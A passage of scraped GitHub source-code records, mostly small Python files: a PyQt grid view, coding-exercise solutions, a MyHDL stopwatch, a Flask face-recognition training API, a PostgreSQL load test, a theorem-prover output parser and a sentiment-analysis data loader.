#initialisation function\n super().__init__()\n self.drawer = Drawer\n self.width = 100\n self.height = 100\n self.grid = gridactivate\n self.view_menu = QMenu(self)\n self.setTransformationAnchor(self.AnchorUnderMouse)\n self.zoom=1\n\t## Draws he grid\n def drawBackground(self, painter, rect):\n if (self.grid):\n gr = rect.toRect()\n start_x = gr.left() + self.width - (gr.left() % self.width)\n start_y = gr.top() + self.height - (gr.top() % self.height)\n painter.save()\n painter.setPen(QColor(60, 70, 80).lighter(90))\n painter.setOpacity(1.2)\n\n for x in range(start_x, gr.right(), self.width):\n painter.drawLine(x, gr.top(), x, gr.bottom())\n\n for y in range(start_y, gr.bottom(), self.height):\n painter.drawLine(gr.left(), y, gr.right(), y)\n painter.restore()\n self.update()\n\n #----------Zoom method-----------------\n\t## Manage the mouse wheel\n def wheelEvent(self, event):\n \"\"\"\n We can zoom in/ zoom out the GraphicsView by using wheelButton of the mouse.\n \"\"\"\n # Zoom Factor\n zoomInFactor = 1.1\n zoomOutFactor = 1 / zoomInFactor\n\n # Zoom\n if event.angleDelta().y() > 0:\n zoomFactor = zoomInFactor\n else:\n zoomFactor = zoomOutFactor\n factor = self.transform().scale(zoomFactor, zoomFactor).mapRect(QRectF(0, 0, 1, 1)).width()\n if factor < 0.15:\n return\n self.scale( zoomFactor, zoomFactor )\n self.drawer.zoom *= zoomFactor\n\t\t\n\t## Toogle the grid\n def setGrid(self, gridactivate):\n self.grid = gridactivate\n self.update()\n","repo_name":"zetechmoy/AutomataCreator","sub_path":"src/Class/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"14286697902","text":"\"\"\"\nGiven a list of words, group the words by anagrams and return a list of sets of anagrams.\n\nExample:\n\n[\"cat\", \"dog\", \"god\"] = > [ {\"cat\"}, {\"dog\", \"god\"} ]\n\"\"\"\n\n\ndef group_anagrams(words):\n return get_list_anagrams_v1(words)\n\n\ndef get_list_anagrams_v2(words):\n \"\"\"\n The solution is the same as v1 but is less verbose and takes advantage of setdefault method\n \"\"\"\n anagram_groups = {}\n for word in words:\n group = anagram_groups.setdefault(\"\".join(sorted(list(word))), set([word]))\n group.add(word)\n\n return list(anagram_groups.values())\n\n\ndef get_list_anagrams_v1(words):\n anagram_groups = {}\n for word in words:\n sorted_word = \"\".join(sorted(word))\n if sorted_word in anagram_groups:\n group = anagram_groups.get(sorted_word)\n group.add(word)\n anagram_groups.update({sorted_word: group})\n else:\n anagram_groups[sorted_word] = set([word])\n\n return list(anagram_groups.values())\n","repo_name":"bonicim/technical_interviews_exposed","sub_path":"src/algorithms/blind_curated_75_leetcode_questions/group_anagrams.py","file_name":"group_anagrams.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"9008433785","text":"import random\nimport os\nimport argparse\nimport torch\nimport time\nimport pickle as pkl\nimport numpy as np\n\nfrom load_data import DataLoader\nfrom base_model import BaseModel\nfrom utils import *\nfrom config import *\nfrom base_HPO import RF_HPO\n\nparser = argparse.ArgumentParser(description=\"Parser for PRINCE\")\nparser.add_argument('--data_path', type=str, default='data/family/')\nparser.add_argument('--seed', type=int, default=1234)\nparser.add_argument('--max_epoch', type=int, default=50)\nparser.add_argument('--gpu', type=int, default=-1)\nparser.add_argument('--topk', type=int, default=-1)\nparser.add_argument('--layers', type=int, default=-1)\nparser.add_argument('--sampling', type=str, default='incremental')\nparser.add_argument('--HPO_acq', type=str, default='max')\nparser.add_argument('--weight', type=str, default=None)\nparser.add_argument('--tau', type=float, default=1.0)\nparser.add_argument('--loss_in_each_layer', action='store_true')\nparser.add_argument('--train', action='store_true')\nparser.add_argument('--eval', action='store_true')\nparser.add_argument('--saveWeight', action='store_true')\nparser.add_argument('--useSearchLog', action='store_true')\nparser.add_argument('--candidate', type=str, default=None)\nargs = parser.parse_args()\n\nclass Options(object):\n pass\n\nif __name__ == '__main__':\n opts = args\n # np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n dataset = args.data_path\n dataset = dataset.split('/')\n if len(dataset[-1]) > 0:\n dataset = dataset[-1]\n else:\n dataset = dataset[-2]\n torch.cuda.set_device(opts.gpu)\n print('==> gpu:', opts.gpu)\n loader = DataLoader(opts.data_path)\n opts.dataset = dataset\n opts.n_ent = loader.n_ent\n opts.n_rel = loader.n_rel\n opts.date = str(time.asctime(time.localtime(time.time())))\n \n # check all output paths\n checkPath('./results/')\n checkPath(f'./results/{dataset}/')\n checkPath(f'{loader.task_dir}/saveModel/')\n HPO_save_path = f'./results/{dataset}/search_log.pkl'\n\n def run_model(params, saveWeight=args.saveWeight, save_path=HPO_save_path, opts=opts, loader=loader):\n # params -> opts\n opts.lr = params['lr']\n opts.decay_rate = params['decay_rate']\n opts.lamb = params['lamb']\n opts.hidden_dim = params['hidden_dim']\n opts.attn_dim = params['attn_dim']\n opts.n_layer = params['n_layer']\n opts.dropout = params['dropout']\n opts.act = params['act']\n opts.MESS_FUNC = params['MESS_FUNC']\n opts.AGG_FUNC = params['AGG_FUNC']\n opts.COMB_FUNC = params['COMB_FUNC']\n opts.n_batch = params['n_batch']\n opts.n_tbatch = params['n_tbatch']\n opts.n_node_topk = [params['n_node_topk']] * params['n_layer']\n opts.n_edge_topk = params['n_edge_topk']\n\n # build model w.r.t. opts\n model = BaseModel(opts, loader)\n opts_str = str(opts)\n \n # train model\n best_mrr = 0\n best_test_mrr = 0\n val_eval_dict, test_eval_dict = {}, {}\n time_begin = time.time()\n for epoch in range(opts.max_epoch):\n v_mrr, v_h1, v_h10 = model.train_batch()\n val_eval_dict[epoch+1] = (v_mrr, v_h1, v_h10)\n \n if v_mrr > best_mrr:\n \n _, _, _, t_mrr, t_h1, t_h10 = model.evaluate(eval_val=False, eval_test=True)\n test_eval_dict[epoch+1] = (t_mrr, t_h1, t_h10)\n\n best_mrr, best_test_mrr = v_mrr, t_mrr\n best_str = '[VALID] MRR:%.4f H@1:%.4f H@10:%.4f\\t [TEST] MRR:%.4f H@1:%.4f H@10:%.4f \\n'%(v_mrr, v_h1, v_h10, t_mrr, t_h1, t_h10)\n print(str(epoch+1) + '\\t' + best_str)\n\n if saveWeight:\n BestMetricStr = f'ValMRR_{str(best_mrr)[:5]}'\n model.saveModelToFiles(BestMetricStr, deleteLastFile=True)\n\n # save to local file\n opts.training_time = time.time() - time_begin\n if not os.path.exists(save_path):\n HPO_records = {}\n else:\n HPO_records = pkl.load(open(save_path, 'rb'))\n HPO_records[opts_str] = (best_mrr, best_test_mrr, val_eval_dict, test_eval_dict, params, opts)\n pkl.dump(HPO_records, open(save_path, 'wb'))\n\n return best_mrr\n\n def loadSearchLog(file):\n assert os.path.exists(file)\n data = pkl.load(open(file, 'rb'))\n config_list, mrr_list = [], []\n for HP_key, HP_values in data.items():\n (best_mrr, best_test_mrr, val_eval_dict, test_eval_dict, params, opts) = HP_values\n \n # config_list.append(params)\n # mrr_list.append(best_mrr)\n for epoch, eval_res in val_eval_dict.items():\n params['epoch'] = epoch\n config_list.append(params)\n mrr_list.append(eval_res[0])\n\n print(f'==> load {len(config_list)} trials from file: {file}')\n return config_list, mrr_list\n\n \n if opts.candidate != None:\n def getNextConfig():\n data = pkl.load(open(opts.candidate, 'rb'))\n for idx in range(len(data)):\n if data[idx]['status'] == 'none':\n data[idx]['status'] = 'running'\n pkl.dump(data, open(opts.candidate, 'wb'))\n return idx, data[idx]['param']\n return -1, None\n\n while True:\n idx, param = getNextConfig()\n print(idx, param)\n if idx == -1: break\n\n try:\n run_model(param)\n except:\n continue\n\n exit()\n\n # standard HPO pipeline\n HPO_search_space['epoch'] = ('choice', [opts.max_epoch])\n HPO_instance = RF_HPO(kgeModelName='PRINCE-v1', obj_function=run_model, dataset_name=opts.dataset, HP_info=HPO_search_space, acq=opts.HPO_acq)\n \n if opts.useSearchLog:\n config_list, mrr_list = loadSearchLog(HPO_save_path)\n dataset_names = [opts.dataset for i in range(len(config_list))]\n HPO_instance.pretrain(config_list, mrr_list, dataset_names=dataset_names)\n \n max_trials, sample_num = 100, 1e4\n HPO_instance.runTrials(max_trials, sample_num, explore_trials=100)\n\n","repo_name":"moguizhizi/adaprop","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"35272821670","text":"\"\"\"Solution for Codewars problem.\n\nKyu: 4\nName: Next smaller number with the same digits\nLink: https://www.codewars.com/kata/5659c6d896bc135c4c00021e\n\"\"\"\n\n\ndef next_smaller(n):\n \"\"\"Find next smallest number using the same digits.\"\"\"\n dig_list = list(str(n))\n\n i = len(dig_list) - 2\n while i >= 0:\n # Look for possible swap (left digit is bigger than the right digit)\n if dig_list[i] > dig_list[i + 1]:\n swap_group = dig_list[i:]\n # Find best possible swap (biggest digit smaller than current digit)\n next_small = max(x for x in swap_group if x < dig_list[i])\n # Check for invalid swap of 0 to front of number\n if i == 0 and next_small == \"0\":\n return -1\n swap_group.remove(next_small)\n dig_list[i:] = [next_small] + sorted(swap_group, reverse=True)\n return int(\"\".join(dig_list))\n\n i -= 1\n\n return -1\n","repo_name":"Pjmcnally/algo","sub_path":"challenges/codewars/04/next_smaller.py","file_name":"next_smaller.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"6860094962","text":"import myhdl\nfrom myhdl import *\n\nfrom TimeCount import TimeCount\nfrom bcd2led import bcd2led\n\ndef StopWatch(tens_led, ones_led, tenths_led, startstop, reset, clock):\n\n \"\"\" 3 digit stopwatch with seconds and tenths of a second.\n \n tens_led: 7 segment led for most significant digit of the seconds\n ones_led: 7 segment led for least significant digit of the seconds\n tenths_led: 7 segment led for tenths of a second\n startstop: input that starts or stops the stopwatch on a posedge\n reset: reset input\n clock: 10Hz clock input\n\n \"\"\"\n\n tens, ones, tenths = [Signal(intbv(0)[4:]) for i in range(3)]\n\n timecount_inst = TimeCount(tens, ones, tenths, startstop, reset, clock)\n bcd2led_tens = bcd2led(tens_led, tens, clock)\n bcd2led_ones = bcd2led(ones_led, ones, clock)\n bcd2led_tenths = bcd2led(tenths_led, tenths, clock)\n\n return timecount_inst, bcd2led_tens, bcd2led_ones, bcd2led_tenths\n\n\ndef convert():\n \n tens_led, ones_led, tenths_led = [Signal(intbv(0)[7:]) for i in range(3)]\n startstop, reset, clock = [Signal(bool(0)) for i in range(3)]\n\n toVerilog(StopWatch, tens_led, ones_led, tenths_led, startstop, reset, clock)\n conversion.analyze(StopWatch, tens_led, ones_led, tenths_led, startstop, reset, clock)\n \n\nconvert()\n \n \n \n \n \n","repo_name":"myhdl/myhdl","sub_path":"example/cookbook/stopwatch/StopWatch.py","file_name":"StopWatch.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":964,"dataset":"github-code","pt":"20"} +{"seq_id":"32700603499","text":"#takes an input between one and ten, then the first 10 values of that numbers times tables\n\nnum = int(input(\"please enter a number between one and ten\"))\nwhile num <1 or num >10:\n num = int(input(\"please enter a number between one and ten\"))\n#endwhile\ncounter = 1\n#prints the first 10 times tables for the input number\nwhile counter > 0 and counter < 11:\n print(num*counter , \",\")\n counter = counter + 1\n#endwhile\n\n## ACS Good .. did you mean each one to be on a separate line?","repo_name":"paolocecco/StartUpPython","sub_path":"Task 7.py","file_name":"Task 7.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"73874657010","text":"from .get_birthdays import get_birthdays \n\n\ndef add_friend_user(vk, id):\n friend_list = []\n\n try:\n friends = vk.friends.get(\n user_id=id, \n fields=['sex', 'bdate', 'city', 'country']\n )['items']\n \n #sort friends by first_name\n friends = sorted(\n friends, \n key=lambda x: x['first_name'])\n except vk.exceptions.VkAPIError as e:\n print(f'Some troubles: {e.code} - {e.message}')\n return 1\n\n try:\n for friend_id in friends:\n vk_dict = {}\n\n vk_dict[\"first_name\"] = friend_id.get('first_name', '-')\n vk_dict[\"last_name\"] = friend_id.get('last_name', '-')\n vk_dict[\"country\"] = dict(friend_id.get('country', '')).get('title', '-')\n vk_dict[\"city\"] = dict(friend_id.get('city', '')).get('title', '-')\n bdate = friend_id.get('bdate', '').split('.')\n vk_dict[\"bdate\"] = get_birthdays(bdate)\n sex = friend_id.get('sex')\n vk_dict[\"sex\"] = 'male' if sex == 2 else 'female'\n \n friend_list.append(vk_dict)\n except Exception as e:\n print(f'Something went wrong adding friends to the dictionary: {e}') \n \n return friend_list\n","repo_name":"kekaiFB/vk_api","sub_path":"vkApi/add_friend_user.py","file_name":"add_friend_user.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7136842163","text":"import ast\nimport json\nimport shutil\nimport subprocess\n\nimport flask\nfrom flask import request\nfrom waitress import serve\nimport configs.config as config\nimport configs.config_api as config_api\nimport base64\nimport os\nfrom threading import Thread\nimport train\n\n\napp = flask.Flask(__name__)\n\n\ndef to_json(data):\n return json.dumps(data, ensure_ascii=False) + \"\\n\"\n\n\n\"\"\"_______________________________________________________________\n Function need to configure output response\n Input:\n 1. API status number-int\n 2. The returned data-any\n Output: \n flask.Response\n _______________________________________________________________\"\"\"\n\n\ndef resp(code, data):\n return flask.Response(\n status=code,\n response=data\n )\n\n\n@app.route(config_api.get_model, methods=['GET'])\ndef get_model():\n json_data = request.get_json(force=True)\n\n try:\n user_id = json_data[\"id_user\"]\n path_to_model = os.path.join(config.path_to_models, str(user_id), \"model_face.h5\")\n model_binary = open(path_to_model, \"rb\")\n model_bin = model_binary.read()\n # print(model_binary.read())\n except Exception as e:\n print(e)\n return resp(400, \"ERROR\")\n return resp(200, to_json(base64.b64encode(bytes(str(model_bin), \"utf-8\")).decode('ascii')))\n\n\n@app.route(config_api.train_model, methods=['GET'])\ndef train_model():\n json_data = request.get_json(force=True)\n user_id = json_data[0]\n main_dir = \"/Users/lashchenov/university/ТРКПО Маслаков/app_access_with_Face_Recognition/neural_network/\"\n try:\n shutil.rmtree(os.path.join(main_dir, f\"images/{user_id}/train/{user_id}\"))\n except:\n pass\n try:\n shutil.rmtree(os.path.join(main_dir, f\"images/{user_id}/test/{user_id}\"))\n except:\n pass\n try:\n shutil.rmtree(os.path.join(main_dir, f\"models/{user_id}\"))\n except:\n pass\n os.makedirs(os.path.join(main_dir, f\"models/{user_id}\"), 0o777)\n os.makedirs(os.path.join(main_dir, f\"images/{user_id}/train/{user_id}\"), 0o777)\n os.makedirs(os.path.join(main_dir, f\"images/{user_id}/test/{user_id}\"), 0o777)\n item = 1\n for train_data in json_data[1]:\n with open(os.path.join(main_dir, f\"images/{user_id}/train/{user_id}/face_{user_id}_{item}.png\"), \"wb\") as f:\n f.write(ast.literal_eval(base64.b64decode(train_data).decode()))\n item += 1\n item = 1\n for test_data in json_data[2]:\n with open(os.path.join(main_dir, f\"images/{user_id}/test/{user_id}/face_{user_id}_{item}.png\"), \"wb\") as f:\n f.write(ast.literal_eval(base64.b64decode(test_data).decode()))\n item += 1\n # os.system(\"conda activate turkin\")\n # subprocess.call([\"python\", \"train.py\", user_id])\n train_thread = Thread(target=train.train, args=(user_id,))\n train_thread.start()\n # train.train(user_id)\n return resp(200, \"success\")\n\n#\n# @app.route(config_api.face_verify, methods=['POST'])\n# def face_verify():\n# json_data = request.get_json(force=True)\n# user_id = json_data[0]\n\n\nif __name__ == \"__main__\":\n app.debug = True\n # train.train('14')\n serve(app, host=config.host, port=config.port)\n","repo_name":"elashchenov/app_face_recognition","sub_path":"neural_network/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37536303341","text":"import macleod\nimport macleod.Commands\nimport macleod.Filemgt\nimport logging\n\n\nclass Reasoner (object):\n\n MODEL_FINDER = 'MODEL_FINDER'\n\n PROVER = 'PROVER'\n\n # initialize\n def __init__(self, name, reasoner_type=None, reasoner_id=None):\n \n logging.getLogger(__name__).debug('Initializing ' + name)\n\n self.identifier = ''\n\n self.type = Reasoner.PROVER\n\n self.args = []\n\n self.input_files = ''\n\n self.output_file = ''\n\n self.ontology = ''\n\n self.time = -1\n\n self.output = None\n\n self.name = name\n\n if reasoner_type:\n self.type = reasoner_type\n if reasoner_id:\n self.identifier = reasoner_id\n else:\n self.identifier = name\n\n self.timeout = macleod.Filemgt.read_config(self.name,'timeout')\n \n logging.getLogger(__name__).debug('Finished initializing ' + name)\n \n\n def getId (self):\n return self.identifier\n \n def __eq__ (self, other):\n if not isinstance(other, Reasoner):\n return False\n if self.identifier == other.identifier:\n return True\n else:\n return False\n\n def __ne__ (self, other):\n return not self.eq(other)\n\n def constructCommand (self, ontology):\n import os\n \"\"\"Return the command (includes constructing it if necessary) to invoke the reasoner.\"\"\"\n self.args = macleod.Commands.get_system_command(self.name, ontology)\n\n self.ontology = ontology\n self.output_file = ontology.get_output_filename(self.name, out=True)\n logging.getLogger(__name__).info(self.name + \" writes output to \" + self.output_file)\n\n logging.getLogger(__name__).debug('Reasoner command: ' + str(self.args))\n return self.args\n\n def getCommand (self):\n return self.args\n\n def getOutputFile (self):\n return self.output_file\n\n def getOntology (self):\n return self.ontology\n\n def isProver (self):\n if self.type==Reasoner.PROVER: return True\n else: return False\n\n def terminatedSuccessfully (self):\n mapping = {\n macleod.Ontology.PROOF: True,\n macleod.Ontology.COUNTEREXAMPLE: True,\n macleod.Ontology.CONSISTENT: True,\n macleod.Ontology.INCONSISTENT: True,\n macleod.Ontology.ERROR : False,\n macleod.Ontology.UNKNOWN : False,\n None: False\n }\n\n def paradox_status(line):\n if 'Theorem' in line:\n #print \"PARADOX SZS status found: THEOREM\"\n return macleod.Ontology.PROOF\n elif 'Unsatisfiable' in line:\n return macleod.Ontology.INCONSISTENT\n elif 'CounterSatisfiable' in line:\n return macleod.Ontology.COUNTEREXAMPLE\n elif 'Satisfiable' in line:\n return macleod.Ontology.CONSISTENT\n else: # Timeout, GaveUp\n return macleod.Ontology.UNKNOWN\n\n def vampire_status(line):\n if 'Refutation not found' in line:\n return macleod.Ontology.UNKNOWN\n elif 'Refutation' in line:\n #print \"VAMPIRE SZS status found: THEOREM\"\n return macleod.Ontology.PROOF\n elif 'Unsatisfiable' in line:\n return macleod.Ontology.INCONSISTENT\n elif 'CounterSatisfiable' in line:\n return macleod.Ontology.COUNTEREXAMPLE\n elif 'Satisfiable' in line:\n return macleod.Ontology.CONSISTENT\n else: # Timeout, GaveUp\n return macleod.Ontology.UNKNOWN\n\n def success_default (self):\n return False\n\n def success_prover9 (self):\n out_file = open(self.output_file, 'r')\n lines = out_file.readlines()\n out_file.close()\n output_lines = [x for x in lines if x.startswith('THEOREM PROVED')]\n if len(output_lines)>0:\n self.output = macleod.Ontology.PROOF\n\n return mapping[self.output]\n\n\n\n def success_vampire (self):\n out_file = open(self.output_file, 'r')\n lines = out_file.readlines()\n out_file.close()\n output_lines = [x for x in lines if x.startswith('% Termination reason:')]\n l = len(output_lines)\n if l==0:\n self.output = macleod.Ontology.UNKNOWN\n # at least one line has a termination reason, so this might be an intermediate line (since Vampire in competition mode restarts several times)\n else:\n # examine the last output line\n self.output = vampire_status(output_lines[l-1])\n if self.output == macleod.Ontology.UNKNOWN:\n # Handle exceptions during parsing\n #print(str(lines))\n output_lines = [x for x in lines if x.startswith('Parser exception:')]\n if len(output_lines)>0:\n self.output = macleod.Ontology.ERROR\n\n return mapping[self.output]\n\n\n def success_paradox (self):\n out_file = open(self.output_file, 'r')\n lines = out_file.readlines()\n out_file.close()\n output_lines = [x for x in lines if x.startswith('+++ RESULT:')]\n if len(output_lines)!=1:\n output_lines = [x for x in lines if x.startswith('*** Unexpected:')]\n #print(str(lines))\n if len(output_lines)>0:\n self.output = macleod.Ontology.ERROR\n else:\n self.output = macleod.Ontology.UNKNOWN\n else:\n self.output = paradox_status(output_lines[0])\n #logging.getLogger(self.__module__ + \".\" + self.__class__.__name__).debug('Paradox terminated successfully : ' + str(self.output))\n\n return mapping[self.output]\n\n def success_mace4 (self):\n out_file = open(self.output_file, 'r')\n lines = out_file.readlines()\n out_file.close()\n output_lines = [x for x in lines if x.startswith('Exiting with 1 model.')]\n if len(output_lines)==0:\n self.output = macleod.Ontology.UNKNOWN\n else:\n self.output = macleod.Ontology.CONSISTENT\n self.output = macleod.Ontology.CONSISTENT\n\n return mapping[self.output]\n\n\n handlers = {\n \"mace4\": success_mace4,\n \"prover9\": success_prover9,\n \"paradox\": success_paradox,\n \"vampire\": success_vampire,\n }\n\n return handlers.get(self.name, success_default)(self)\n\n def terminatedWithError (self):\n # need to involve terminatedSuccessfully to make sure the self.output is set\n self.terminatedSuccessfully()\n\n if self.output==macleod.Ontology.ERROR:\n return True\n else:\n return False\n\n def terminatedUnknowingly (self):\n return not(self.terminatedSuccessfully()) and not(self.terminatedWithError())\n\n def isDone (self):\n if self.output is None:\n return False\n else:\n return True\n","repo_name":"thahmann/macleod","sub_path":"src/macleod/Reasoner.py","file_name":"Reasoner.py","file_ext":"py","file_size_in_byte":7236,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"20"} +{"seq_id":"36531932656","text":"# For loops\r\n\r\n\r\nfor i in range(30):\r\n print(i)\r\n\r\na={}\r\nfor i in range(30):\r\n a[i] = i\r\n\r\nprint(a)\r\n\r\n\r\n#from urllib import request as urlrequest\r\nfrom urllib import request\r\n\r\nproxy_host={'http': 'http://proxy.fisdev.local:8080'}\r\nurl='http://sixty-north.com/c/t.txt'\r\nvproxy = {'http': 'http://proxy.fisdev.local:8080', 'https': 'http://proxy.fisdev.local:8080'}\r\n#url = 'http://portal.azure.com/'\r\n\r\nurl='https://fisglobal.sharepoint.com/sites/fisandme'\r\nurl='http://www.google.com/'\r\nproxy = request.ProxyHandler(vproxy)\r\nauth = request.HTTPBasicAuthHandler()\r\nopener = request.build_opener(proxy, auth, request.HTTPHandler)\r\nrequest.install_opener(opener)\r\n\r\nstory = request.urlopen(url)\r\n\r\nprint(story)\r\nstory_words = []\r\nfor line in story:\r\n line_words = line.split()\r\n for word in line_words:\r\n story_words.append(word)\r\nstory.close()\r\nprint(story_words)","repo_name":"lboricua67/PythonV3","sub_path":"CorePythonGettingStarted/Example4-URLLIB.py","file_name":"Example4-URLLIB.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31984062636","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom locust import Locust, between, TaskSet, task, events\nimport psycopg2\nimport time\n\n\ndef create_conn():\n return psycopg2.connect(dbname='test_pg', user='admin',\n password='admin', host='localhost')\n\n\ndef execute_query(query):\n with create_conn() as conn:\n with conn.cursor() as cursor:\n cursor.execute(\n \"\"\"SELECT * FROM test_ser_prop_ts\n WHERE prop_a = 10 and prop_b = 10 \n and ts && tstzrange(NOW(), NOW() + '10 day':: interval)\"\"\")\n records = cursor.fetchall()\n print(records)\n\n\nclass PsqlClient:\n\n def __getattr__(self, name):\n def wrapper(*args, **kwargs):\n start_time = time.time()\n try:\n res = execute_query(*args, **kwargs)\n #print('Result ----------->' + str(res.fetchone()))\n events.request_success.fire(request_type=\"psql\",\n name=name,\n response_time=int(\n (time.time() - start_time) * 1000),\n response_length=res.rowcount)\n except Exception as e:\n events.request_failure.fire(request_type=\"psql\",\n name=name,\n response_time=int(\n (time.time() - start_time) * 1000),\n exception=e)\n\n print('error {}'.format(e))\n\n return wrapper\n\n\nclass CustomTaskSet(TaskSet):\n conn_string = 'employee-metrics:employee-metrics@emp1-metrics-db-1/emp'\n\n @task(1)\n def execute_query(self):\n self.client.execute_query(\n \"select * from employees where date_of_birth like '%Jan%'\")\n\n# This class will be executed when you fire up locust\n\n\nclass PsqlLocust(Locust):\n min_wait = 0\n max_wait = 0\n task_set = CustomTaskSet\n wait_time = between(min_wait, max_wait)\n\n def __init__(self):\n super()\n self.client = PsqlClient()\n# explain analyze verbose\n# SELECT * FROM test_ser_prop_ts\n# WHERE prop_a = 10 and ts & & tstzrange(NOW(), NOW() + '10 day': : interval)\n#\n#\n# explain analyze\n# SELECT * FROM test_ser_prop_no_ts\n# WHERE prop_a = 10 and end_ts > NOW() and start_ts < NOW() + '10 day':: interval\n#\n# explain analyze verbose\n# SELECT * FROM test_ser_prop_ts\n# WHERE ts & & tstzrange(NOW(), NOW() + '10 day': : interval)\n#\n# explain analyze\n# SELECT * FROM test_ser_prop_no_ts\n# WHERE end_ts > NOW() and start_ts < NOW() + '10 day':: interval\n","repo_name":"Miktor/postgre_timestamp","sub_path":"locust/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"73616206128","text":"from io import open\r\nimport torch\r\nimport re\r\nimport numpy as np\r\nimport gensim\r\nfrom torch.utils.data import Dataset\r\nfrom SA_Config import Config\r\n\r\n\r\nclass Data_set(Dataset):\r\n def __init__(self, Data, Label) -> None:\r\n super().__init__()\r\n self.Data = Data\r\n if Label is not None:\r\n self.Label = Label\r\n\r\n # 返回数据集大小\r\n def __len__(self):\r\n return len(self.Data)\r\n\r\n # 根据索引返回数据\r\n def __getitem__(self, index):\r\n if self.Label is not None:\r\n data = torch.from_numpy(self.Data[index])\r\n label = torch.from_numpy(np.array(self.Label[index]))\r\n return data, label\r\n else:\r\n data = torch.from_numpy(self.Data[index])\r\n return data\r\n\r\n# 停用词列表\r\ndef stopwordslist():\r\n stopwords = [line.strip() for line in open(\r\n Config.stop_words_path, encoding='utf-8').readlines()]\r\n return stopwords\r\n\r\n# 构建单词到id的映射文件\r\ndef build_word2id(save_to_path):\r\n \"\"\"\r\n :param save_to_path: word2id保存的文件路径\r\n :return None\r\n \"\"\"\r\n stopwords = stopwordslist()\r\n word2id = {'_PAD_': 0}\r\n path = [Config.train_path, Config.val_path]\r\n for _path in path:\r\n with open(_path, encoding='utf-8') as f:\r\n for line in f.readlines():\r\n out_list = []\r\n sp = line.strip().split()\r\n\r\n # 第0个词为标签\r\n for word in sp[1:]:\r\n if word not in stopwords:\r\n rt = re.findall('[a-zA-Z]+', word)\r\n if word != '\\t':\r\n # 忽略英文词\r\n if len(rt) == 1:\r\n continue\r\n else:\r\n out_list.append(word)\r\n\r\n # word : id 形式添加到word2id字典中\r\n for word in out_list:\r\n if word not in word2id.keys():\r\n word2id[word] = len(word2id)\r\n\r\n # 写入到文件中\r\n with open(save_to_path, 'w', encoding='utf-8') as f:\r\n for w in word2id:\r\n f.write(w + '\\t')\r\n f.write(str(word2id[w]))\r\n f.write('\\n')\r\n\r\n# 用word2vec预训练模型构建词向量\r\ndef build_word2vec(fname, word2id, save_to_path=None):\r\n \"\"\"\r\n :param fname: 预训练的word2vec.\r\n :param word2id: 语料文本中包含的词汇集.\r\n :param save_to_path: 保存训练语料库中的词组对应的word2vec到本地\r\n :return: 语料文本中词汇集对应的word2vec向量{id: word2vec}.\r\n \"\"\"\r\n n_words = max(word2id.values()) + 1\r\n model = gensim.models.KeyedVectors.load_word2vec_format(fname, binary=True)\r\n\r\n # word_vecs 矩阵初始化为 词典大小 * 词向��维度\r\n word2vec = np.array(np.random.uniform(-1, 1, [n_words, model.vector_size]))\r\n for word in word2id.keys():\r\n try:\r\n # 词对应的id转换成词向量\r\n word2vec[word2id[word]] = model[word]\r\n except:\r\n pass\r\n\r\n if save_to_path:\r\n with open(save_to_path, 'w', encoding='utf-8') as f:\r\n for vec in word2vec:\r\n vec = [str(w) for w in vec]\r\n f.write(' '.join(vec))\r\n f.write('\\n')\r\n return word2vec\r\n\r\n# 将句子中的词转换为对应的id数组和标签值\r\ndef text_to_array(word2id, seq_lenth, path):\r\n\r\n label_array = []\r\n i = 0\r\n sa = []\r\n\r\n # 句子数量\r\n sa_count = len(open(path, encoding='utf-8').readlines())\r\n\r\n with open(path, encoding='utf-8') as f:\r\n # 句子id矩阵每个元素初始为0\r\n sentences_array = np.zeros(shape=(sa_count, seq_lenth))\r\n for line in f.readlines():\r\n data = line.strip().split()\r\n words = data[1:]\r\n ids = [word2id.get(word, 0) for word in words]\r\n ids_array = np.array(ids).reshape(1, -1)\r\n\r\n # 比序列长度短的在前面补0\r\n # sentences_array 后面ids_array长度的值替换为ids_array中的值\r\n # sentences_array 前面的值还是原来初始的0,相当于在前面补0\r\n if np.size(ids_array, 1) < seq_lenth:\r\n sentences_array[i, seq_lenth - np.size(ids_array, 1):] = ids_array[0, :]\r\n # 比序列长度长的直接截断,只取序列长度\r\n else:\r\n sentences_array[i, 0:seq_lenth] = ids_array[0, 0:seq_lenth]\r\n\r\n i = i + 1\r\n # 取标签值\r\n label_array.append(int(data[0]))\r\n\r\n return np.array(sentences_array), label_array\r\n\r\n# 将句子中的词转换为对应的id数组\r\ndef text_to_array_no_label(word2id, seq_lenth, path):\r\n\r\n i = 0\r\n sa = []\r\n\r\n # 句子数量\r\n sa_count = len(open(path, encoding='utf-8').readlines())\r\n\r\n with open(path, encoding='utf-8') as f:\r\n # 句子id矩阵每个元素初始为0\r\n sentences_array = np.zeros(shape=(sa_count, seq_lenth))\r\n for line in f.readlines():\r\n data = line.strip().split()\r\n words = data[1:]\r\n ids = [word2id.get(word, 0) for word in words]\r\n ids_array = np.array(ids).reshape(1, -1)\r\n\r\n # 